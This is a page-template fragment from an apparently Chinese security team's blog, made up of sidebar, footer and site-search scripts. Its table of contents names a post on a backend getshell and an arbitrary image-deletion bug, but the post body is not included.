          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/cai_font.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description">一支有梦想的技术团队</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">36</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.qq.com" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.weixin.com" target="_blank" title="微信">
                      
                        <i class="fa fa-fw fa-weixin"></i>微信</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.baidu.com" target="_blank" title="QQ群">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ群</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://baidu.com/" title="百度" target="_blank">百度</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://baidu.com/" title="QQ" target="_blank">QQ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://baidu.com/" title="微博" target="_blank">微博</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-后台GETSHELL"><span class="nav-number">1.</span> <span class="nav-text">1. 后台GETSHELL</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞代码处："><span class="nav-number">1.1.</span> <span class="nav-text">漏洞代码处：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#加上这三段代码，便于调试"><span class="nav-number">1.1.1.</span> <span class="nav-text">加上这三段代码，便于调试</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#把Burp抓的包放到Repeater-按住ctrl-r-模块里"><span class="nav-number">1.1.2.</span> <span class="nav-text">把Burp抓的包放到Repeater( 按住ctrl+r )模块里</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#前台任意删除他人图片"><span class="nav-number">2.</span> <span class="nav-text">前台任意删除他人图片:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞处"><span class="nav-number">2.1.</span> <span class="nav-text">漏洞处:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞讲解开始"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞讲解开始</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#代码处"><span class="nav-number">2.3.</span> <span class="nav-text">代码处:</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder"></span>

  
</div>




<div class="theme-info">
  <div class="powered-by"></div> 
  <span class="post-count"><strong>QQ群 : xxxxxxxxxxxxx</strong></span>
  <span class="post-meta-divider">|</span>
</div>

<div class="theme-info">
  <div class="powered-by"></div> 
  <span class="post-count">We are <i>Cai_Team</i>.</span>
  <span class="post-meta-divider">|</span>
  <span class="post-count">十年寒窗无人问，一举成名天下知</span>
</div>

<br>

<div class="theme-info">
  <div class="powered-by"></div> 
  <span class="post-count">博客文章字数共 22.2k 哟~</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      此站已有 <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人访问
    </span>
  

  
    <span class="site-pv">
      此站总访问量 <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: '4o0M8wbn5KRpOElHEHQ9xvrm-gzGzoHsz',
        appKey: 'GXbplAnGtcPsivqGS3OgATet',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
